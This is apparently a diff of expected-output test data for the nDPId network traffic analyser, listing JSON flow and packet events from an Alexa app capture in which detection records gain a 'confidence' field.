 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1490976031774,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976031774,"pkt":"AMDKkaPvePiC0\/vCCABFAAAofGhAAEAGypqsECrYNF7ohsGkAFBD6jbXzFD9MlAQAVe0dgAA"}
-00927{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":143,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976031691,"flow_last_seen":1490976031776,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":808,"flow_tot_l4_payload_len":808,"flow_avg_l4_payload_len":202,"midstream":0,"ts_msec":1490976031776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49572,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"http": {"hostname":"alexa.amazon.com","url":"alexa.amazon.com\/manifest\/pitangui.appcache","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36"}}
+00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":143,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976031691,"flow_last_seen":1490976031776,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":808,"flow_tot_l4_payload_len":808,"flow_avg_l4_payload_len":202,"midstream":0,"ts_msec":1490976031776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49572,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"http": {"hostname":"alexa.amazon.com","url":"alexa.amazon.com\/manifest\/pitangui.appcache","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36"}}
 00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":148,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976032763,"flow_last_seen":1490976032763,"flow_idle_time":120000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1490976032763,"l3_proto":"ip6","src_ip":"fe80::7af8:82ff:fed3:fbc2","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3}
 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":148,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1490976032763,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":90,"pkt_l4_len":28,"ts_msec":1490976032763,"pkt":"MzMAAAAWePiC0\/vCht1gAAAAACQAAf6AAAAAAAAAeviC\/\/7T+8L\/AgAAAAAAAAAAAAAAAAAWOgAFAgAAAQCPAHvkAAAAAQQAAAD\/AgAAAAAAAAAAAAH\/0\/vC"}
-00591{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":148,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976032763,"flow_last_seen":1490976032763,"flow_idle_time":120000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1490976032763,"l3_proto":"ip6","src_ip":"fe80::7af8:82ff:fed3:fbc2","dst_ip":"ff02::16","l4_proto":"icmp6","ndpi": {"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
+00617{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":148,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976032763,"flow_last_seen":1490976032763,"flow_idle_time":120000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1490976032763,"l3_proto":"ip6","src_ip":"fe80::7af8:82ff:fed3:fbc2","dst_ip":"ff02::16","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":149,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1490976032763,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":90,"pkt_l4_len":28,"ts_msec":1490976032763,"pkt":"MzMAAAAWePiC0\/vCht1gAAAAACQAAf6AAAAAAAAAeviC\/\/7T+8L\/AgAAAAAAAAAAAAAAAAAWOgAFAgAAAQCPAHvkAAAAAQQAAAD\/AgAAAAAAAAAAAAH\/0\/vC"}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":154,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976035502,"flow_last_seen":1490976035502,"flow_idle_time":180000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1490976035502,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":23559,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00514{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":154,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1490976035502,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":100,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":100,"pkt_l4_len":66,"ts_msec":1490976035502,"pkt":"AMDKkaPvePiC0\/vCCABFAABWWlJAAEARM0usECrYrBAqAVwHADUAQq4NgPsBAAABAAAAAAAAEGNvZ25pdG8taWRlbnRpdHkJdXMtZWFzdC0xCWFtYXpvbmF3cwNjb20AAAEAAQ=="}
-00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":154,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976035502,"flow_last_seen":1490976035502,"flow_idle_time":180000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1490976035502,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":23559,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"cognito-identity.us-east-1.amazonaws.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00798{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":154,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976035502,"flow_last_seen":1490976035502,"flow_idle_time":180000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1490976035502,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":23559,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"cognito-identity.us-east-1.amazonaws.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00643{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":157,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1490976035549,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":196,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":196,"pkt_l4_len":162,"ts_msec":1490976035549,"pkt":"ePiC0\/vCAMDKkaPvCABFAAC20jNAAEARuwmsECoBrBAq2AA1XAcAoid0gPuBgAABAAYAAAAAEGNvZ25pdG8taWRlbnRpdHkJdXMtZWFzdC0xCWFtYXpvbmF3cwNjb20AAAEAAcAMAAEAAQAAAAIABCLHNPDADAABAAEAAAACAAQ0AM87wAwAAQABAAAAAgAENBT4ysAMAAEAAQAAAAIABCLAPyvADAABAAEAAAACAAQ0ynf3wAwAAQABAAAAAgAENq23qQ=="}
-00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":157,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976035502,"flow_last_seen":1490976035549,"flow_idle_time":180000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":106,"midstream":0,"ts_msec":1490976035549,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":23559,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"cognito-identity.us-east-1.amazonaws.com","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"34.199.52.240"}}
+00815{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":157,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976035502,"flow_last_seen":1490976035549,"flow_idle_time":180000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":106,"midstream":0,"ts_msec":1490976035549,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":23559,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"cognito-identity.us-east-1.amazonaws.com","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"34.199.52.240"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":158,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976035553,"flow_last_seen":1490976035553,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976035553,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38363,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":158,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1490976035553,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976035553,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8JIdAAEAG55WsECrYIsc08JXbAbv9XGi0AAAAAKAC\/\/\/OjgAAAgQFtAQCCAoA9kwzAAAAAAEDAwg="}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":159,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1490976035610,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976035610,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAOsGYRwixzTwrBAq2AG7ldsM0X8G\/VxotaASaN9A1wAAAgQFtAQCCApEF1TYAPZMMwEDAwg="}
 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":160,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1490976035612,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1490976035612,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0JIhAAEAG55ysECrYIsc08JXbAbv9XGi1DNF\/B4AQAVfXJgAAAQEICgD2TDlEF1TY"}
-00850{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":161,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976035553,"flow_last_seen":1490976035616,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":228,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":57,"midstream":0,"ts_msec":1490976035616,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38363,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-00907{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":163,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976035553,"flow_last_seen":1490976035733,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1676,"flow_avg_l4_payload_len":279,"midstream":0,"ts_msec":1490976035733,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38363,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
-01294{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":165,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976035553,"flow_last_seen":1490976035733,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3617,"flow_avg_l4_payload_len":452,"midstream":0,"ts_msec":1490976035733,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38363,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","server_names":"cognito-identity.amazonaws.com,cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=cognito-identity.us-east-1.amazonaws.com","alpn":"h2,http\/1.1","fingerprint":"56:17:8F:E9:45:10:32:78:FF:FD:E3:09:60:5A:B5:3B:8D:8C:F8:34"}}
+00876{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":161,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976035553,"flow_last_seen":1490976035616,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":228,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":57,"midstream":0,"ts_msec":1490976035616,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38363,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00933{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":163,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976035553,"flow_last_seen":1490976035733,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1676,"flow_avg_l4_payload_len":279,"midstream":0,"ts_msec":1490976035733,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38363,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
+01320{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":165,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976035553,"flow_last_seen":1490976035733,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3617,"flow_avg_l4_payload_len":452,"midstream":0,"ts_msec":1490976035733,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38363,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","server_names":"cognito-identity.amazonaws.com,cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=cognito-identity.us-east-1.amazonaws.com","alpn":"h2,http\/1.1","fingerprint":"56:17:8F:E9:45:10:32:78:FF:FD:E3:09:60:5A:B5:3B:8D:8C:F8:34"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":182,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976037754,"flow_last_seen":1490976037754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976037754,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38364,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":182,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1490976037754,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976037754,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8+KpAAEAGE3KsECrYIsc08JXcAbvRHbWkAAAAAKAC\/\/+tAQAAAgQFtAQCCAoA9k0OAAAAAAEDAwg="}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1490976037803,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976037803,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAOoGYhwixzTwrBAq2AG7ldw4CtRs0R21paASaN+cagAAAgQFtAQCCApEF1cYAPZNDgEDAwg="}
 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1490976037807,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1490976037807,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0+KtAAEAGE3msECrYIsc08JXcAbvRHbWlOArUbYAQAVcyugAAAQEICgD2TRREF1cY"}
-00850{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":185,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976037754,"flow_last_seen":1490976037809,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":65,"midstream":0,"ts_msec":1490976037809,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38364,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-00904{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":187,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976037754,"flow_last_seen":1490976037920,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":405,"flow_avg_l4_payload_len":67,"midstream":0,"ts_msec":1490976037920,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38364,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
+00876{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":185,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976037754,"flow_last_seen":1490976037809,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":65,"midstream":0,"ts_msec":1490976037809,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38364,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00930{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":187,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976037754,"flow_last_seen":1490976037920,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":405,"flow_avg_l4_payload_len":67,"midstream":0,"ts_msec":1490976037920,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38364,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":195,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041150,"flow_last_seen":1490976041150,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1490976041150,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":54886,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":195,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1490976041150,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"ts_msec":1490976041150,"pkt":"AMDKkaPvePiC0\/vCCABFAABBWlNAAEARM1+sECrYrBAqAdZmADUALY4\/ocgBAAABAAAAAAAACHBpdGFuZ3VpBmFtYXpvbgNjb20AAAEAAQ=="}
-00746{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":195,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041150,"flow_last_seen":1490976041150,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1490976041150,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":54886,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"pitangui.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
